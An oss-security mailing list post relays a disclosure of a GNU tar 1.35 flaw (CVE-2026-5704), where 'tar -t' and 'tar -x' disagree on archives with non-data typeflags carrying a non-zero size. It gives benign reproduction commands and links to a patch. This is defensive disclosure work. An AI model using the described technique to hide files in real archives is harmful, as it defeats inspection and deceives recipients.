[oss-security] GNU tar: listing/extraction desynchronization allows hidden file injection

Sat, 11 Apr 2026 10:10:47 -0700 

https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00007.html disclosed:

From:    Guillermo de Angel
Subject: GNU tar: listing/extraction desynchronization allows hidden file 
injection (tar -t vs tar -x)
Date:    Wed, 18 Mar 2026 15:55:41 +0100

Hello,

I am reporting a security issue in GNU tar 1.35 where tar -t and tar -x produce
different results when processing archives containing non-data-bearing typeflags
(symlink, chardev, blockdev, FIFO) with a non-zero size field.

Summary:

 - tar -t respects the size field and skips the data blocks
 - tar -x ignores the size field and parses the data blocks as headers
 - Result: files embedded in the data region are invisible to listing but are
   created on disk during extraction

This enables hidden file injection: an attacker can craft a small archive
(< 3 KB) where tar -t reports N entries but tar -x creates N+M files.

Any security workflow that relies on tar -t for pre-extraction inspection will
have an incomplete view of the archive contents.

Reproduction (GNU tar 1.35, Ubuntu 24.04):

$ tar -tf desync_chardev.tar
carrier_entry
marker.txt

$ mkdir /tmp/test && tar -xf desync_chardev.tar -C /tmp/test
$ ls /tmp/test/
carrier_entry injected.txt marker.txt
^^^^^^^^^^^^
not in listing

bsdtar 3.7.2 is consistent in both modes (lists and extracts all 3 entries).

Affected typeflags: '2' (symlink), '3' (chardev), '4' (blockdev), '6' (FIFO).
Typeflag '5' (directory) is not affected.

I have attached:

1. Full advisory with root cause analysis and impact assessment
2. Standalone PoC generator (Python 3, no dependencies)
3. Four minimal PoC archives (one per affected typeflag)

I am happy to coordinate on a disclosure timeline. Please let me know if you
need additional information or testing.

Regards,

Guillermo de Angel


Red Hat appears to have assigned CVE-2026-5704 to this issue.

Paul Eggert provided a patch in
https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00011.html
which is also available in
https://cgit.git.savannah.gnu.org/cgit/tar.git/commit/?id=b8d8a61b25588caca4efaf9bdd2e3f1a49da77e3

https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00012.html points out
that a similar report was also included in
https://lists.gnu.org/archive/html/bug-tar/2026-02/msg00022.html
along with a number of other bug reports.

--
        -Alan Coopersmith-                 [email protected]
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Reply via email to